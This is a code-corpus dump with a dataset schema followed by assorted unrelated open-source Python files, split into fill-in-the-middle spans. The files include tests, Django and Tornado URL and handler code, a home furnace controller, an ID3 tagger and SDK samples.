Dataset schema (one row per code sample; observed value ranges):

    repo_name   stringlengths   5 .. 100
    path        stringlengths   4 .. 231
    language    stringclasses   1 value
    license     stringclasses   15 values
    size        int64           6 .. 947k
    score       float64         0 .. 0.34
    prefix      stringlengths   0 .. 8.16k
    middle      stringlengths   3 .. 512
    suffix      stringlengths   0 .. 8.17k
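The columns above are the shape of a fill-in-the-middle (FIM) code corpus: each row is a Python file split into prefix, middle, and suffix spans (the mid-word breaks inside the records below are those split points, with newlines collapsed by the dump). A minimal sketch of rejoining one row into the original file, assuming rows are available as plain dicts with these fields; the dataset's name and loader are not given here, so the row literal is hypothetical:

    def reassemble(row):
        """Concatenate the FIM spans back into the original source text."""
        return row["prefix"] + row["middle"] + row["suffix"]

    # Hypothetical row, mirroring the first record below with newlines restored.
    row = {
        "repo_name": "unnikrishnankgs/va",
        "path": "venv/lib/python3.5/site-packages/nbformat/_version.py",
        "prefix": "# Make sure t",
        "middle": "o update package.json, too!\nversion_info = (4, 3, 0)\n__version__ = '.'.join",
        "suffix": "(map(str, version_info))\n",
    }

    print(reassemble(row))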
unnikrishnankgs/va
venv/lib/python3.5/site-packages/nbformat/_version.py
Python
bsd-2-clause
113
0
# Make sure to update package.json, too!
version_info = (4, 3, 0)
__version__ = '.'.join(map(str, version_info))
timtadh/PyOhio2011
t_predictive.py
Python
bsd-3-clause
562
0.007117
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: Tim Henderson
#Email: tim.tadh@hackthology.com
#For licensing see the LICENSE file in the top level directory.

from predictive import parse

def t_expr_compound():
    assert (4*3/2) == parse('4*3/2')
    assert (4/2*3) == parse('4/2*3')
    assert ((3+9)*4/8) == parse('(3+9)*4/8')
    assert (((9-3)*(5-3))/2 + 2) == parse('((9-3)*(5-3))/2 + 2')
    assert (5 * 4 / 2 - 10 + 5 - 2 + 3) == parse('5 * 4 / 2 - 10 + 5 - 2 + 3')
    assert (5 / 4 * 2 + 10 - 5 * 2 / 3) == parse('5 / 4 * 2 + 10 - 5 * 2 / 3')
praneetmehta/FSMD
ID3update.py
Python
mit
3,922
0.031362
import urllib2
import eyed3
import mechanize
import os
from bs4 import BeautifulSoup as bs
import unicodedata as ud
import sys
import string

reload(sys)
sys.setdefaultencoding('utf-8')

class Song:
    def __init__(self, keyword, filename, albumart, aaformat, dd='/home/praneet/Music/'):
        self.info = keyword.split('@')
        self.filename = os.path.join(dd, filename).encode('utf-8')
        self.keyword = urllib2.quote(('').join(self.info))
        self.albumart = albumart
        self.aaformat = aaformat
        self.album = ''
        self.artist = string.capwords(self.info[1])
        self.title = self.info[0]
        self.feat = ' '
        self.genre = 'Unknown'
        self.dd = dd
        self.fetchID3()

    def fetchID3(self):
        browser = mechanize.Browser()
        browser.set_handle_robots(False)
        browser.addheaders = [('User-agent', 'Mozilla')]
        searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q=" + urllib2.quote(self.title + ' ' + self.artist + ' song')
        html = browser.open(searchURL)
        soup = bs(html, 'html.parser')
        souplist = soup.findAll(attrs={'class': '_o0d'})
        for i in range(1, len(souplist)):
            if souplist[i].get_text().split(':')[0].lower() == 'album' or souplist[i].get_text().split(':')[0].lower() == 'movie':
                self.album = souplist[i].get_text().split(':')[1]
                print 'album ', souplist[i].get_text().split(':')[1]
            elif souplist[i].get_text().split(':')[0].lower() == 'artist' or souplist[i].get_text().split(':')[0].lower() == 'artists':
                self.artist = souplist[i].get_text().split(':')[1]
                print 'artist ', souplist[i].get_text().split(':')[1]
            elif souplist[i].get_text().split(':')[0].lower() == 'genre' or souplist[i].get_text().split(':')[0].lower() == 'genres':
                self.genre = souplist[i].get_text().split(':')[1]
                print 'genre ', souplist[i].get_text().split(':')[1]
            elif souplist[i].get_text().split(':')[0].lower() == 'featured artist' or souplist[i].get_text().split(':')[0].lower() == 'featured artists':
                self.feat = souplist[i].get_text().split(':')[1]
                print 'featured artist ', souplist[i].get_text().split(':')[1]
            else:
                pass
        self.fetchalbum()

    def fetchalbum(self):
        browser = mechanize.Browser()
        browser.set_handle_robots(False)
        browser.addheaders = [('User-agent', 'Mozilla')]
        searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q=" + urllib2.quote(self.title + ' ' + self.artist + ' album name')
        html = browser.open(searchURL)
        soup = bs(html, 'html.parser')
        for i in soup.findAll(attrs={'class': '_B5d'}):
            if self.album == '':
                self.album = i.get_text()
                print self.album
            break
        if self.album == '':
            if not self.info[2].isspace() and self.info[2] != '':
                self.album = string.capwords(self.info[2])
            else:
                self.album = self.title + '- Single'
        print 'album', self.album

    def updateID3(self):
        audiofile = eyed3.load(self.filename)
        try:
            audiofile.tag.artist = unicode(self.artist, "utf-8")
        except:
            audiofile.tag.artist = self.artist
        try:
            audiofile.tag.album = unicode(self.album, "utf-8")
        except:
            audiofile.tag.album = self.album
        title = ''
        if self.feat == ' ':
            title = self.title
        else:
            title = self.title + ' ft. ' + self.feat
        try:
            audiofile.tag.title = unicode(title, "utf-8")
        except:
            audiofile.tag.title = title
        try:
            audiofile.tag.genre = unicode(self.genre, "utf-8")
        except:
            audiofile.tag.genre = self.genre
        audiofile.tag.images.set(3, open(self.albumart, 'rb').read(), 'image/' + self.aaformat)
        audiofile.tag.save()
        if not os.path.isfile(self.dd + title + '.mp3'):
            os.rename(self.filename, self.dd + title.rstrip() + '.mp3')
        else:
            newTitle = raw_input('Similar file already exits, enter new file name: ')
            os.rename(self.filename, self.dd + newTitle.rstrip() + '.mp3')
        print 'update complete'
        os.remove(self.albumart)

# newsong = Song('Rockabye','Rockabye.mp3', 'rockabye','rockabye album art.jpeg','jpeg')
# newsong.updateID3()
hzlf/openbroadcast
website/cms/tests/apphooks.py
Python
gpl-3.0
9,529
0.006716
# -*- coding: utf-8 -*-
from __future__ import with_statement
from cms.api import create_page, create_title
from cms.apphook_pool import apphook_pool
from cms.appresolver import (applications_page_check, clear_app_resolvers,
    get_app_patterns)
from cms.test_utils.testcases import CMSTestCase
from cms.test_utils.util.context_managers import SettingsOverride
from django.contrib.auth.models import User
from django.core.urlresolvers import clear_url_caches, reverse
import sys

APP_NAME = 'SampleApp'
APP_MODULE = "cms.test_utils.project.sampleapp.cms_app"

class ApphooksTestCase(CMSTestCase):

    def setUp(self):
        clear_app_resolvers()
        clear_url_caches()
        if APP_MODULE in sys.modules:
            del sys.modules[APP_MODULE]

    def tearDown(self):
        clear_app_resolvers()
        clear_url_caches()
        if APP_MODULE in sys.modules:
            del sys.modules[APP_MODULE]

    def test_explicit_apphooks(self):
        """
        Test explicit apphook loading with the CMS_APPHOOKS setting.
        """
        apphooks = (
            '%s.%s' % (APP_MODULE, APP_NAME),
        )
        with SettingsOverride(CMS_APPHOOKS=apphooks):
            apphook_pool.clear()
            hooks = apphook_pool.get_apphooks()
            app_names = [hook[0] for hook in hooks]
            self.assertEqual(len(hooks), 1)
            self.assertEqual(app_names, [APP_NAME])
            apphook_pool.clear()

    def test_implicit_apphooks(self):
        """
        Test implicit apphook loading with INSTALLED_APPS + cms_app.py
        """
        apps = ['cms.test_utils.project.sampleapp']
        with SettingsOverride(INSTALLED_APPS=apps, ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'):
            apphook_pool.clear()
            hooks = apphook_pool.get_apphooks()
            app_names = [hook[0] for hook in hooks]
            self.assertEqual(len(hooks), 1)
            self.assertEqual(app_names, [APP_NAME])
            apphook_pool.clear()

    def test_apphook_on_root(self):
        with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'):
            apphook_pool.clear()
            superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
            page = create_page("apphooked-page", "nav_playground.html", "en",
                               created_by=superuser, published=True, apphook="SampleApp")
            blank_page = create_page("not-apphooked-page", "nav_playground.html", "en",
                                     created_by=superuser, published=True, apphook="", slug='blankapp')
            english_title = page.title_set.all()[0]
            self.assertEquals(english_title.language, 'en')
            create_title("de", "aphooked-page-de", page, apphook="SampleApp")
            self.assertTrue(page.publish())
            self.assertTrue(blank_page.publish())

            response = self.client.get(self.get_pages_root())
            self.assertTemplateUsed(response, 'sampleapp/home.html')

            response = self.client.get('/en/blankapp/')
            self.assertTemplateUsed(response, 'nav_playground.html')

            apphook_pool.clear()

    def test_apphook_on_root_reverse(self):
        with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'):
            apphook_pool.clear()
            superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
            page = create_page("apphooked-page", "nav_playground.html", "en",
                               created_by=superuser, published=True, apphook="SampleApp")
            create_title("de", "aphooked-page-de", page, apphook="SampleApp")
            self.assertTrue(page.publish())

            self.assertFalse(reverse('sample-settings').startswith('//'))

            apphook_pool.clear()

    def test_get_page_for_apphook(self):
        with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'):
            apphook_pool.clear()
            superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
            page = create_page("home", "nav_playground.html", "en",
                               created_by=superuser, published=True)
            create_title('de', page.get_title(), page)
            child_page = create_page("child_page", "nav_playground.html", "en",
                                     created_by=superuser, published=True, parent=page)
            create_title('de', child_page.get_title(), child_page)
            child_child_page = create_page("child_child_page", "nav_playground.html", "en",
                                           created_by=superuser, published=True, parent=child_page, apphook='SampleApp')
            create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp')
            child_child_page.publish()
            # publisher_public is set to draft on publish, issue with onetoone reverse
            child_child_page = self.reload(child_child_page)

            en_title = child_child_page.publisher_public.get_title_obj('en')
            path = reverse('en:sample-settings')
            request = self.get_request(path)
            request.LANGUAGE_CODE = 'en'
            attached_to_page = applications_page_check(request, path=path[1:])  # strip leading slash
            self.assertEquals(attached_to_page.pk, en_title.page.pk)
            response = self.client.get(path)
            self.assertEquals(response.status_code, 200)
            self.assertTemplateUsed(response, 'sampleapp/home.html')
            self.assertContains(response, en_title.title)

            de_title = child_child_page.publisher_public.get_title_obj('de')
            path = reverse('de:sample-settings')
            request = self.get_request(path)
            request.LANGUAGE_CODE = 'de'
            attached_to_page = applications_page_check(request, path=path[4:])  # strip leading slash and language prefix
            self.assertEquals(attached_to_page.pk, de_title.page.pk)
            response = self.client.get(path)
            self.assertEquals(response.status_code, 200)
            self.assertTemplateUsed(response, 'sampleapp/home.html')
            self.assertContains(response, de_title.title)

            apphook_pool.clear()

    def test_include_urlconf(self):
        with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'):
            apphook_pool.clear()
            superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
            page = create_page("home", "nav_playground.html", "en",
                               created_by=superuser, published=True)
            create_title('de', page.get_title(), page)
            child_page = create_page("child_page", "nav_playground.html", "en",
                                     created_by=superuser, published=True, parent=page)
            create_title('de', child_page.get_title(), child_page)
            child_child_page = create_page("child_child_page", "nav_playground.html", "en",
                                           created_by=superuser, published=True, parent=child_page, apphook='SampleApp')
            create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp')
            child_child_page.publish()

            path = reverse('extra_second')
            response = self.client.get(path)
            self.assertEquals(response.status_code, 200)
            self.assertTemplateUsed(response, 'sampleapp/extra.html')
            self.assertContains(response, "test included urlconf")

            path = reverse('extra_first')
            response = self.client.get(path)
            self.assertEquals(response.status_code, 200)
            self.assertTemplateUsed(response, 'sampleapp/extra.html')
            self.assertContains(response, "test urlconf")

            path = reverse('de:extra_first')
            response = self.client.get(p
ilendl2/chrisdev-cookiecutter
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/photos/urls.py
Python
bsd-3-clause
387
0.002584
from django.conf.urls import patterns, url, include

from .views import GalleryListView, GalleryDetailView

urlpatterns = patterns("",
    url(
        regex=r"^gallery_list/$",
        view=GalleryListView.as_view(),
        name="gallery_list",
    ),
    url(
        regex=r"^gallery/(?P<pk>\d+)/$",
        view=GalleryDetailView.as_view(),
        name="gallery_detail",
    ),
)
Sorsly/subtle
google-cloud-sdk/lib/googlecloudsdk/command_lib/compute/sole_tenancy/sole_tenancy_hosts/flags.py
Python
mit
967
0
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Flag related helpers for sole tenancy related commands."""
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute import scope as compute_scope

SOLE_TENANCY_HOST_TYPE_RESOLVER = compute_flags.ResourceResolver.FromMap(
    'sole tenancy host type',
    {compute_scope.ScopeEnum.ZONE: 'compute.hostTypes'})
rowhit/h2o-2
py/testdir_single_jvm/test_NN2_twovalues.py
Python
apache-2.0
5,312
0.012236
import unittest, time, sys, re
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_nn, h2o_cmd, h2o_browse as h2b, h2o_import as h2i, h2o_gbm

def write_syn_dataset(csvPathname, rowCount, rowDataTrue, rowDataFalse, outputTrue, outputFalse):
    dsf = open(csvPathname, "w+")
    for i in range(int(rowCount/2)):
        dsf.write(rowDataTrue + ',' + outputTrue + "\n")
    for i in range(int(rowCount/2)):
        dsf.write(rowDataFalse + ',' + outputFalse + "\n")
    dsf.close()

class test_NN_twovalues(unittest.TestCase):
    def tearDown(self):
        h2o.check_sandbox_for_errors()

    @classmethod
    def setUpClass(cls):
        # fails with 3
        global SEED
        SEED = h2o.setup_random_seed()
        h2o.init(1, java_heap_GB=4)
        # h2b.browseTheCloud()

    @classmethod
    def tearDownClass(cls):
        h2o.tear_down_cloud(h2o.nodes)

    def test_DeepLearning_twovalues(self):
        SYNDATASETS_DIR = h2o.make_syn_dir()
        csvFilename = "syn_twovalues.csv"
        csvPathname = SYNDATASETS_DIR + '/' + csvFilename

        rowDataTrue = "1, 0, 65, 1, 2, 1, 1, 4, 1, 4, 1, 4"
        rowDataFalse = "0, 1, 0, -1, -2, -1, -1, -4, -1, -4, -1, -4"

        twoValueList = [
            ('A','B',0, 14),
            ('A','B',1, 14),
            (0,1,0, 12),
            (0,1,1, 12),
            (0,1,'NaN', 12),
            (1,0,'NaN', 12),
            (-1,1,0, 12),
            (-1,1,1, 12),
            (-1e1,1e1,1e1, 12),
            (-1e1,1e1,-1e1, 12),
        ]

        trial = 0
        for (outputTrue, outputFalse, case, coeffNum) in twoValueList:
            write_syn_dataset(csvPathname, 20, rowDataTrue, rowDataFalse, str(outputTrue), str(outputFalse))

            start = time.time()
            hex_key = csvFilename + "_" + str(trial)
            model_key = 'trial_' + str(trial) + '.hex'
            validation_key = hex_key

            parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key)
            print "using outputTrue: %s outputFalse: %s" % (outputTrue, outputFalse)

            inspect = h2o_cmd.runInspect(None, parseResult['destination_key'])
            print "\n" + csvPathname, \
                "    numRows:", "{:,}".format(inspect['numRows']), \
                "    numCols:", "{:,}".format(inspect['numCols'])

            response = inspect['numCols']
            response = 'C' + str(response)

            kwargs = {
                'ignored_cols'                : None,
                'response'                    : response,
                'classification'              : 1,
                'activation'                  : 'Tanh',
                #'input_dropout_ratio'         : 0.2,
                'hidden'                      : '113,71,54',
                'rate'                        : 0.01,
                'rate_annealing'              : 1e-6,
                'momentum_start'              : 0,
                'momentum_stable'             : 0,
                'l1'                          : 0.0,
                'l2'                          : 1e-6,
                'seed'                        : 80023842348,
                'loss'                        : 'CrossEntropy',
                #'max_w2'                      : 15,
                'initial_weight_distribution' : 'UniformAdaptive',
                #'initial_weight_scale'        : 0.01,
                'epochs'                      : 100,
                'destination_key'             : model_key,
                'validation'                  : hex_key,
            }
            timeoutSecs = 60
            start = time.time()
            h2o_cmd.runDeepLearning(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs)
            print "trial #", trial, "Deep Learning end on ", csvFilename, ' took', time.time() - start, 'seconds'

            #### Now score using the model, and check the validation error
            expectedErr = 0.00
            relTol = 0.01
            predict_key = 'Predict.hex'

            kwargs = {
                'data_key': validation_key,
                'destination_key': predict_key,
                'model_key': model_key
            }
            predictResult = h2o_cmd.runPredict(timeoutSecs=timeoutSecs, **kwargs)
            h2o_cmd.runInspect(key=predict_key, verbose=True)

            kwargs = {}
            predictCMResult = h2o.nodes[0].predict_confusion_matrix(
                actual=validation_key,
                vactual=response,
                predict=predict_key,
                vpredict='predict',
                timeoutSecs=timeoutSecs, **kwargs)

            cm = predictCMResult['cm']
            print h2o_gbm.pp_cm(cm)
            actualErr = h2o_gbm.pp_cm_summary(cm)/100.

            print "actual   classification error:" + format(actualErr)
            print "expected classification error:" + format(expectedErr)
            if actualErr != expectedErr and abs((expectedErr - actualErr)/expectedErr) > relTol:
                raise Exception("Scored classification error of %s is not within %s %% relative error of %s" %
                    (actualErr, float(relTol)*100, expectedErr))

            trial += 1

if __name__ == '__main__':
    h2o.unit_main()
040medien/furnaceathome
furnace_client.py
Python
gpl-2.0
15,051
0.011694
#! /usr/bin/env python

import bluetooth
import subprocess
import re
import time
import string
import pywapi
import httplib
import ast
import socket
import ConfigParser
import io
from datetime import datetime, date
from time import mktime
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
from ssl import SSLError
from socket import error as SocketError

class Config:
    """Holds basic settings as well as current state"""
    def __init__(self):
        c = ConfigParser.RawConfigParser()
        c.read('.furnace.cfg')
        self.bluetooth_addr = c.get('relay', 'bluetooth_addr')
        self.bluetooth_port = c.getint('relay', 'bluetooth_port')
        self.relay_channels = c.getint('relay', 'channels')
        self.primary_furnace = c.getint('relay', 'primary_furnace')
        self.base_url = c.get('url', 'base_url')
        self.secret = c.get('url', 'secret')
        self.zip_code = c.get('house', 'zip_code')
        self.room = c.get('house', 'room')
        self.home_status = ''
        self.mode = ''
        self.last_time_home=0
        self.indoor_temp_target=0
        self.indoor_temp_target_dict={}
        self.default_temp_day=c.getint('default_temp', 'day')
        self.default_temp_night=c.getint('default_temp', 'night')
        self.default_temp_away=c.getint('default_temp', 'away')
        presence_devices=c.items('devices')
        presence_devices_wifi=[]
        for device in presence_devices:
            presence_devices_wifi.append(dict(owner=device[0], ip_address=device[1], timestamp=0))
        self.presence_devices_wifi = presence_devices_wifi

    def write(self):
        c = ConfigParser.RawConfigParser()
        c.write('.furnace.cfg')

def ping(ip_address):
    """Determines if a certain IP address is currently used on our network
    (to determine device presence)."""
    try:
        ping = subprocess.Popen(["nmap", "-sP", ip_address], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, error = ping.communicate()
        received=-1
        if out:
            try:
                received=int(re.findall(r"(\d+) host up", out)[0])
            except:
                received=0
        else:
            print 'No response from nmap'
    except subprocess.CalledProcessError:
        print "Couldn't get a ping"
    return received

def getTarget(config, indoor_temp):
    """Defines the target temperature and current operating mode
    (target temp, day default, night default)."""
    now = datetime.now()
    home_status = config.home_status
    indoor_temp_target_dict = config.indoor_temp_target_dict
    print "%s:%s" % (string.zfill(now.hour,2), string.zfill(now.minute,2))
    utimestamp=mktime(datetime.now().utctimetuple())
    default_temp_day = config.default_temp_day
    default_temp_night = config.default_temp_night
    default_temp_away = config.default_temp_away
    default_temp_mode = ''
    config.mode = ''
    try:
        default_temp = indoor_temp_target_dict['default_temperature']
        default_temp_mode = indoor_temp_target_dict['default_temperature_mode']
        target_timestamp = indoor_temp_target_dict['date'] + indoor_temp_target_dict['start_minutes'] * 60
        target_end_timestamp = indoor_temp_target_dict['date'] + indoor_temp_target_dict['start_minutes'] * 60 + indoor_temp_target_dict['held_minutes'] * 60
        if target_end_timestamp > utimestamp:
            time_to_target = int(round((target_timestamp - utimestamp) / 60))
            time_to_end = int(round((target_end_timestamp - utimestamp) / 60))
            if target_timestamp > utimestamp:
                print "we've got a target coming up in %s minutes" % time_to_target
            # we need about 2 minutes per degree Celsius
            if time_to_target <= 0 or time_to_target * 2 <= indoor_temp_target_dict['temperature'] - indoor_temp:
                config.indoor_temp_target = indoor_temp_target_dict['temperature']
                config.mode = 'timer'
                print "setting target to %s degrees Celsius for %s more minutes" % (indoor_temp_target_dict['temperature'], time_to_end)
    except KeyError:
        print "no target set"
    if config.mode != 'timer':
        # TODO: make the time periods configurable in the interface
        if datetime.today().isoweekday() <= 5:
            # Week day
            if home_status=='away':
                config.mode='away'
                if config.mode == default_temp_mode and default_temp != default_temp_away:
                    config.indoor_temp_target = default_temp
                    print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
                    config.default_temp_away = default_temp
                else:
                    config.indoor_temp_target=default_temp_away
            elif (0 <= now.hour < 7) and home_status=='home':
                config.mode='night'
                if config.mode == default_temp_mode and default_temp != default_temp_night:
                    config.indoor_temp_target = default_temp
                    print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
                    config.default_temp_night = default_temp
                else:
                    config.indoor_temp_target = default_temp_night
            elif 7 <= now.hour and home_status=='home':
                config.mode='day'
                if config.mode == default_temp_mode and default_temp != default_temp_day:
                    config.indoor_temp_target = default_temp
                    print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
                    config.default_temp_day = default_temp
                else:
                    config.indoor_temp_target = default_temp_day
        else:
            # Weekend
            if home_status=='away':
                config.mode='away'
                if config.mode == default_temp_mode and default_temp != default_temp_away:
                    config.indoor_temp_target = default_temp
                    print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
                    config.default_temp_away = default_temp
                else:
                    config.indoor_temp_target=default_temp_away
            elif (0 <= now.hour < 8) and home_status=='home':
                config.mode='night'
                if config.mode == default_temp_mode and default_temp != default_temp_night:
                    config.indoor_temp_target = default_temp
                    print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
                    config.default_temp_night = default_temp
                else:
                    config.indoor_temp_target = default_temp_night
            elif 8 <= now.hour and home_status=='home':
                config.mode='day'
                if config.mode == default_temp_mode and default_temp != default_temp_day:
                    config.indoor_temp_target = default_temp
                    print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
                    config.default_temp_day = default_temp
                else:
                    config.indoor_temp_target = default_temp_day
    config.write
    return config

def checkPresence(config):
    """Pings all configured devices to determine who's at home"""
    no_of_users_at_home=0
    last_time_home=config.last_time_home
    now = mktime(datetime.now().utctimetuple())
    for device in config.presence_devices_wifi:
        if device['timestamp'] >= now - 600:
            print "Assuming %s is still at home" % device['owner']
            no_of_users_at_home+=1
    if no_of_users_at_home == 0:
        for device in config.presence_devices_wifi:
            if ping(device['ip_address']) > 0:
                print "%s seems to be at home" % device['owner']
                device['timestamp']=now
                last_time_home=now
                no_of_users_at_home+=1
        if no_of_users_at_home > 0:
            home_status='home'
        else:
            home_status='away'
    else:
        home_status='home'
    return last_time_ho
anhstudios/swganh
data/scripts/templates/object/mobile/shared_dressed_binayre_ruffian_trandoshan_male_01.py
Python
mit
472
0.04661
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES

from swgpy.object import *

def create(kernel):
    result = Creature()

    result.template = "object/mobile/shared_dressed_binayre_ruffian_trandoshan_male_01.iff"
    result.attribute_template_id = 9
    result.stfName("npc_name","trandoshan_base_male")

    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####

    return result
rebase-helper/rebase-helper
rebasehelper/helpers/input_helper.py
Python
gpl-2.0
3,222
0.000622
# -*- coding: utf-8 -*-
#
# This tool helps you rebase your package to the latest version
# Copyright (C) 2013-2019 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors: Petr Hráček <phracek@redhat.com>
#          Tomáš Hozza <thozza@redhat.com>
#          Nikola Forró <nforro@redhat.com>
#          František Nečas <fifinecas@seznam.cz>

import logging

from typing import cast

from rebasehelper.logger import CustomLogger

logger: CustomLogger = cast(CustomLogger, logging.getLogger(__name__))

class InputHelper:
    """Class for command line interaction with the user."""

    @staticmethod
    def strtobool(message):
        """Converts a user message to a corresponding truth value.

        This method is a replacement for deprecated strtobool from distutils,
        its behaviour remains the same.

        Args:
            message (str): Message to evaluate.

        Returns:
            bool: True on 'y', 'yes', 't', 'true', 'on' and '1'.
            False on 'n', 'no', 'f', 'false', 'off' and '0'.

        Raises:
            ValueError: On any other value.

        """
        message = message.lower()
        if message in ('y', 'yes', 't', 'true', 'on', '1'):
            return True
        elif message in ('n', 'no', 'f', 'false', 'off', '0'):
            return False
        raise ValueError('No conversion to truth value for "{}"'.format(message))

    @classmethod
    def get_message(cls, message, default_yes=True, any_input=False):
        """Prompts a user with yes/no message and gets the response.

        Args:
            message (str): Prompt string.
            default_yes (bool): If the default value should be YES.
            any_input (bool): Whether to return default value regardless of input.

        Returns:
            bool: True or False, based on user's input.

        """
        if default_yes:
            choice = '[Y/n]'
        else:
            choice = '[y/N]'

        if any_input:
            msg = '{0} '.format(message)
        else:
            msg = '{0} {1}? '.format(message, choice)

        while True:
            user_input = input(msg).lower()

            if not user_input or any_input:
                return True if default_yes else False

            try:
                user_input = cls.strtobool(user_input)
            except ValueError:
                logger.error('You have to type y(es) or n(o).')
                continue

            if any_input:
                return True
            else:
                return bool(user_input)
ptphp/PtPy
pttornado/src/handler/user.py
Python
bsd-3-clause
712
0.018786
#!/usr/bin/env python
#coding=utf8

import datetime
import logging

from handler import UserBaseHandler
from lib.route import route
from lib.util import vmobile

@route(r'/user', name='user')  # user back-end home page
class UserHandler(UserBaseHandler):
    def get(self):
        user = self.get_current_user()
        try:
            self.session['user'] = user
            self.session.save()
        except:
            pass
        self.render('user/index.html')

@route(r'/user/profile', name='user_profile')  # user profile
class ProfileHandler(UserBaseHandler):
    def get(self):
        self.render('user/profile.html')

    def post(self):
        self.redirect('/user/profile')
googleapis/python-translate
samples/generated_samples/translate_v3beta1_generated_translation_service_get_glossary_sync.py
Python
apache-2.0
1,480
0.000676
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetGlossary
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
#   python3 -m pip install google-cloud-translate


# [START translate_v3beta1_generated_TranslationService_GetGlossary_sync]
from google.cloud import translate_v3beta1


def sample_get_glossary():
    # Create a client
    client = translate_v3beta1.TranslationServiceClient()

    # Initialize request argument(s)
    request = translate_v3beta1.GetGlossaryRequest(
        name="name_value",
    )

    # Make the request
    response = client.get_glossary(request=request)

    # Handle the response
    print(response)

# [END translate_v3beta1_generated_TranslationService_GetGlossary_sync]
jmchilton/galaxy-central
galaxy/test/functional/test_3B_GetEncodeData.py
Python
mit
1,185
0.01097
from galaxy.test.base.twilltestcase import TwillTestCase
#from twilltestcase import TwillTestCase

class EncodeTests(TwillTestCase):

    def test_00_first(self):   # will run first due to its name
        """3B_GetEncodeData: Clearing history"""
        self.clear_history()

    def test_10_Encode_Data(self):
        """3B_GetEncodeData: Getting encode data"""
        self.run_tool('encode_import_chromatin_and_chromosomes1', hg17=['cc.EarlyRepSeg.20051216.bed'] )
        # hg17=[ "cc.EarlyRepSeg.20051216.bed", "cc.EarlyRepSeg.20051216.gencode_partitioned.bed",
        #        "cc.LateRepSeg.20051216.bed", "cc.LateRepSeg.20051216.gencode_partitioned.bed",
        #        "cc.MidRepSeg.20051216.bed", "cc.MidRepSeg.20051216.gencode_partitioned.bed" ] )
        self.wait()
        self.check_data('cc.EarlyRepSeg.20051216.bed', hid=1)
        # self.check_data('cc.EarlyRepSeg.20051216.gencode_partitioned.bed', hid=2)
        # self.check_data('cc.LateRepSeg.20051216.bed', hid=3)
        # self.check_data('cc.LateRepSeg.20051216.gencode_partitioned.bed', hid=4)
        # self.check_data('cc.MidRepSeg.20051216.bed', hid=5)
        # self.check_data('cc.MidRepSeg.20051216.gencode_partitioned.bed', hid=6)
t104801/webapp
security/urls.py
Python
gpl-3.0
1,479
0.004057
from django.conf.urls import url
from django.contrib.auth.views import login, \
    logout, \
    logout_then_login, \
    password_change, \
    password_change_done, \
    password_reset, \
    password_reset_done, \
    password_reset_confirm, \
    password_reset_complete

from . import views

urlpatterns = [
    url(r'^$', views.dashboard, name='dashboard'),

    # login / logout urls
    url(r'^login/$', view=login, name='login'),
    url(r'^logout/$', view=logout, name='logout'),
    url(r'^logout-then-login/$', view=logout_then_login, name='logout_then_login'),

    # change password urls
    url(r'^password-change/$', view=password_change, name='password_change'),
    url(r'^password-change/done/$', view=password_change_done, name='password_change_done'),

    # restore password urls
    url(r'^password-reset/$', view=password_reset, name='password_reset'),
    url(r'^password-reset/done/$', view=password_reset_done, name='password_reset_done'),
